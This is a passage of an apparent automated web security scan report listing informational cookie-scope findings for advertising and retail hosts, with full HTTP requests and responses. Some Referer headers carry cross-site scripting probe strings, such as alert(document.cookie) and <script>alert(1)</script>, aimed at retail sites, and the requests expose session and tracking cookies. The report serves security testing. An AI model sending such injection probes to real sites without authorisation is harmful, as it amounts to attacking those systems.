P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 125


<!-- Active server list retrived from APC Store -->
<!-- Using Ad Server http://10.130.8.33:8080/adserver/pixel -->



12.61. http://s.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=16993&_t=cm HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AG-00000001389358554; 1780853-B1781017=3|1781033|0|0|0|1781015|1781012|-1; C1780853=0@4; 66281-B66290=3|0|0|0|0|66286|110253|-1; 90514-B90519=0|0|0|0|0|66286|110253|-1; M62795-747980=1; 1315892-B1315899=0|0|0|0|0|1315897|1315896|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:57:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-1970 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1315892-B1315899=0|0|0|0|0|1315897|1315896|-1; domain=.ru4.com; path=/
Set-cookie: O16993=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Set-cookie: C1315892=0@0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Content-type: text/html
Content-length: 20992
Connection: close

_cm_registerCallback(1105, function (data) {

//v3.7.18

var xptid = "";
var xpsid = "";
var xpcost = "";
var xpcg = "";
var xpordernum = "";
var xprand = 0; //tes
...[SNIP]...

12.62. http://sales.liveperson.net/hc/1402662/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/1402662/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/1402662/?&site=1402662&cmd=mTagStartPage&lpCallId=336706150556-6703310413&protV=20&lpjson=1&page=http%3A//www.bluefly.com/&id=9169521417&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-bluefly-english&activePlugin=none&cobrowse=true&pageWindowName=1305510902500&PV%21unit=bluefly-english&PV%21BlockInvite=1&PV%21pageLoadTime=12%20sec&PV%21visitorActive=1&title=Bluefly%20-%20Designer%20Clothing%2C%20Handbags%2C%20Shoes%20%26%20Accessories%20%28Prada%2C%20Fendi%2C%20Gucci%20%26%20more%29%20at%20Discount%20Prices&cookie=SSID%3DAwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI%3B%20SSSC%3D1.G5607126572844751644.1.58.1115%3B%20SSOD%3DAGHw_gAA%3B%20SSLB%3D1%3B%20SSRT%3D64PQTQE%3B%20TLTHID%3D7D2A76E47F5F107F24CCB1BBDF37F7B5%3B%20TLTSID%3D7D2A76E47F5F107F24CCB1BBDF37F7B5%3B%20JSESSIONID%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%3B%20_714bc2c9%3Dguest%3B%20CS_TRACKER_ID%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%3B%20TS18d374%3Df627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb%3B%20__utmz%3D9200358.1305510900.1.1.utmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29%3B%20__utma%3D9200358.576523501.1305510900.1305510900.1305510900.1%3B%20__utmc%3D9200358%3B%20__utmb%3D9200358.1.10.1305510900%3B%20cmTPSet%3DY%3B%20CoreAt%3D%3B%20mr_referredVisitor%3D0%3B%20bn_u%3D6923549130717770549%3B%20bn_cd%3Dd%2526g%2526s%2526r%253D0.1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8637489434147818322; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC; HumanClickACTIVE=1305510914551

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_1402662=STANDALONE; path=/hc/1402662
Set-Cookie: LivePersonID=-16101514677756-1305510918:-1:-1:-1:-1; expires=Tue, 15-May-2012 02:03:16 GMT; path=/hc/1402662; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:03:16 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 186

lpConnLib.Process({"ResultSet": {"lpCallId":"336706150556-6703310413","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

12.63. http://sales.liveperson.net/hc/46281118/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/46281118/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/46281118/?&site=46281118&cmd=mTagStartPage&lpCallId=926428298465-128955706488&protV=20&lpjson=1&page=http%3A//www.petco.com/%3FAID%3D10413444%26PID%3D2537521%26cm_mmc%3DCJ-_-CID-_-2537521-_-10413444&id=2321407874&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-petco-english&activePlugin=none&cobrowse=true&PV%21unit=sales-petco&PV%21pageLoadTime=46%20sec&PV%21visitorActive=1&SV%21language=english&title=Pet%20Supplies%20-%20Pet%20Products%20-%20Pet%20Food%20%7C%20PETCO.com&cobrowse=true&cookie=SL_Audience%3D423%7CAccelerated%7C92%7C7%7C0%3B%20SL_NV7%3D1%7C7%3B%20CMAVID%3Dnone%3B%20cmTPSet%3DY%3B%20VisitHistorySession%3D%3B%20VisitHistory%3DLastDirectVisitDate%3D5/15/2011%206%3A42%3A24%20PM%3B%20__utmz%3D215766422.1305510193.1.1.utmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29%3B%20RES_TRACKINGID%3D256672559073194%3B%20MP%3DCJ%3D1%26CJExpiry%3D6/19/2011%206%3A53%3A14%20PM%26CJ_AFFILIATEENTEREDDATE%3D5/15/2011%206%3A53%3A14%20PM%3B%20Basket%3DAffiliateCJExpiryDate%3D6/19/2011%206%3A53%3A14%20PM%26PID%3D2537521%26AID%3D10413444%3B%20SL_UVId%3D28F6BEFE806000C3%3B%20__utma%3D215766422.2089458932.1305510193.1305510193.1305510193.1%3B%20__utmc%3D215766422%3B%20__utmv%3D215766422.SL_TS_Accelerated%3B%20__utmb%3D215766422.2.10.1305510193%3B%20mt.v%3D1.1314269718.1305510194589%3B%20RES_SESSIONID%3D18709185067564%3B%20ResonanceSegment%3D2%3B%20CoreAt%3D90002311%3D1%7C2%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C1%7C1305510189%7C14_16_18_20_21_22_25_%7C%26%3B%20SASId%3Dsid%253DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%253Bcsid%253D2%253Bnsid%253D0%253Blut%253D1305510840147%253B%3B%20SAVId%3Dvid%253DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%253Bnvid%253D0%253Bcvid%253D1%253Bplen%253D88%253Bpid%253D55d11a247d01f4c640b3ba5752e78685d%253Bpdx%253D88%253Bglen%253D233%253Bgid%253Dc3089e6d97b75860d4a6aed45da60c42%253Bgdx%253D0%253Bpt%253D0%253B HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=-16101514677756-1305510216:-1:-1:-1:-1; HumanClickSiteContainerID_46281118=STANDALONE; HumanClickKEY=9049118658396575219; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510890596

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_46281118=STANDALONE; path=/hc/46281118
Set-Cookie: LivePersonID=-16101514677756-1305510894:-1:-1:-1:-1; expires=Tue, 15-May-2012 02:01:39 GMT; path=/hc/46281118; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:01:39 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"926428298465-128955706488","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

12.64. http://sales.liveperson.net/hc/53965383/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/53965383/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/53965383/?&site=53965383&cmd=mTagStartPage&lpCallId=767577826510-270394106628&protV=20&lpjson=1&page=http%3A//www.toshibadirect.com/td/b2c/laptops.to%3Fpage%3DsegHHO&id=4691856149&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-toshiba-english&activePlugin=none&cobrowse=true&PV%21unit=toshiba&PV%21language=english&PV%21Section=laptop&PV%21pageLoadTime=77%20sec&PV%21visitorActive=1&title=Toshiba%20Direct%20%7C%20Toshiba%20Laptop%20%26%20Notebook%20Computers&cobrowse=true&cookie=tais.current.segment%3DHHO%3B%20BV_IDS%3Dcccdadfdidkkkjmcgfkceghdgngdglo.0%3A@@@@1170188602.1305510022@@@@%3B%20s_vi%3D%5BCS%5Dv1%7C26E84051851D3EE4-40000143C043A343%5BCE%5D%3B%20ysm_CK1K17SBM0N76O75C93SIIUNQINTO%3Dysm_PV1K17SBM0N76O75C93SIIUNQINTO%3A2%26ysm_SN1K17SBM0N76O75C93SIIUNQINTO%3A1305510047274%26ysm_LD1K17SBM0N76O75C93SIIUNQINTO%3A0%3B%20s_pers%3D%2520s_vnum%253D1308102050353%252526vn%25253D1%257C1308102050353%253B%2520omtr_eVar45_cvp%253D%25255B%25255B%27Direct%25252520Load%27%25252C%271305510050403%27%25255D%25255D%257C1463362850403%253B%2520s_invisit%253Dtrue%257C1305512630631%253B%2520omtr_lv%253D1305510830635%257C1400118830635%253B%2520omtr_lv_s%253DFirst%252520Visit%257C1305512630635%253B%2520s_nr%253D1305510830639%257C1308102830639%253B%2520omtr_pv%253DSearch%25253ALaptops%252520Home%252520Page%257C1305512631142%253B%3B%20s_sess%3D%2520s_cc%253Dtrue%253B%2520SC_LINKS%253D%253B%2520omtr_eVar49%253DD%25253Dc49%253B%2520c_m%253DundefinedDirect%252520LoadDirect%252520Load%253B%2520s_sq%253D%253B%2520s_ppv%253D34%253B HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=-16101514677756-1305510079:-1:-1:-1:-1; HumanClickSiteContainerID_53965383=STANDALONE; HumanClickKEY=7617520773511781761; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510908159

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_53965383=STANDALONE; path=/hc/53965383
Set-Cookie: LivePersonID=-16101514677756-1305510911:-1:-1:-1:-1; expires=Tue, 15-May-2012 02:02:56 GMT; path=/hc/53965383; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 16 May 2011 02:02:56 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"767577826510-270394106628","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

12.65. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/blue-nile-15026564.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seal-alaskaoregonwesternwashington.bbb.org
Path:   /logo/rbhzbus/blue-nile-15026564.png

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /logo/rbhzbus/blue-nile-15026564.png HTTP/1.1
Host: seal-alaskaoregonwesternwashington.bbb.org
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:47 GMT
Server: Apache
Set-Cookie: logolink=15026564; path=/; domain=alaskaoregonwesternwashington.bbb.org
Set-Cookie: logolink=15026564; path=/; domain=bbb.org
Content-Disposition: inline; filename="seal-for-15026564.png"
Expires: Mon, 16 May 2011 06:28:51 GMT
Last-Modified: Sun, 15 May 2011 18:28:51 GMT
Etag: b69d8f80e55ef7e800faaca310c64b63
Content-Type: image/png
Content-Length: 8248

.PNG
.
...IHDR.......&........l....IDATx...y|......yf.d.I .CX." .,."...e...Z....m....R.....m..R.@.
(.. ..o            YI&....s.?..Ib@H..V~......9..3s...9...D...h..{...........!..#T.m&...(?.....6...X.!...o..
...[SNIP]...

12.66. https://secure.bluenile.com/accounts/account-sign-in.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bluenile.com
Path:   /accounts/account-sign-in.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; pop=sweeps~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=C4A385CE7874D0A2B551FC74E3744D04; Path=/; Secure
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:06:40 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; Domain=.bluenile.com; Expires=Tue, 15-May-2012 02:06:40 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63219


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your
...[SNIP]...

12.67. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=30364&partnerID=64&clientID=4391&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: segments_p1="eJzjYuFo2czIxczxL5yLi2PPPmaBf5vPvWMBAEeMB9M="; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI2N119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF49ZlFgEli742V71gUmDT2PwHSBkwW268BaQCvyAyE; io_freq_p1="eJzjkuY4HijAJLH3xsp3LAqMGj9BtAGTxfZrQBoAnC8L5w=="

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:42:26 GMT
Set-Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM=";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 15-May-2012 10:42:26 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1057210&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


12.68. http://srv.clickfuse.com/pixels/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srv.clickfuse.com
Path:   /pixels/create.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixels/create.php?name=criteo&expire=30 HTTP/1.1
Host: srv.clickfuse.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712968%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2710&c=2&cb=40851379534
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Mon, 16 May 2011 02:02:58 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR", policyref="/w3c/p3p.xml"
Server: Apache
Set-Cookie: criteo=tagged; expires=Wed, 15-Jun-2011 02:02:58 GMT; path=/; domain=.clickfuse.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Connection: keep-alive
Content-Length: 42

GIF89a.............!.......,...........D..

12.69. http://srv2.wa.marketingsolutions.yahoo.com/script/ScriptServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srv2.wa.marketingsolutions.yahoo.com
Path:   /script/ScriptServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/ScriptServlet?aid=1K17SBM0N76O75C93SIIUNQINTO HTTP/1.1
Host: srv2.wa.marketingsolutions.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: B=ek8k2sl67ofpa&b=3&s=sm

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:41:20 GMT
P3P: policyref = "http://p3p.yahoo.com/w3c/p3p2.xml", CP = "NOI DSP COR CURa ADMo DEVa PSAa PSDa OUR BUS IND UNI PUR COM NAV INT STA"
Set-Cookie: SYSTEM_USER_ID=FLRTMBVOCL8UVKO69ABBTHN724; Domain=.wa.marketingsolutions.yahoo.com; Expires=Fri, 15-May-2015 10:41:20 GMT; Path=/
Expires: Mon, 16 May 2011 18:41:20 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Cache-Control: private
Content-Length: 8628


function ysm1(){}ysm1.prototype.ysm2=function(s){if(typeof(s)=='string'&&s!=null)return true;else return false;};ysm1.prototype.ysm3=function(o){if(typeof(o)=='object'&&o!=null)return true;else retur
...[SNIP]...

12.70. http://sync.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=5&mt_exuid=4dd07bc8-e97b-118c-3dec-7b8c5c3065303452389e-4fca-41aa-bb8c-dae5ee1bcb77 HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1305510870; mt_mop=1:1305510843|5:1305510870|9:1305510197
If-None-Match: 4dd07bc8-e97b-118c-3dec-7b8c5c306530

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x4 pid 0x413f 16703
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 16 May 2011 01:54:39 GMT
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1305510879; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:39 GMT
Set-Cookie: mt_mop=5:1305510879|1:1305510843|9:1305510197; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:54:39 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

12.71. http://t.p.mybuys.com/webrec/wr.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webrec/wr.do?client=FTD&sessionId=129049F1-9E12-5C65-0540-FAB5539F48D0&pt=h&mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457&lang=en&v=4.7.3&mbts=1305510812851&rf=http%3A%2F%2Fwww.ftd.com%2F&purl=http%3A%2F%2Fwww.ftd.com%2F HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=51654E8D34B839005773ACAD4995CED6; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=121DDBF01A174938896EB120A64A3127; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:07:43 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 34

<html>
<body>
</body>
</html>

12.72. http://tags.mediaforge.com/if/50

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.mediaforge.com
Path:   /if/50

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /if/50 HTTP/1.1
Host: tags.mediaforge.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/plain
Content-Type: text/html
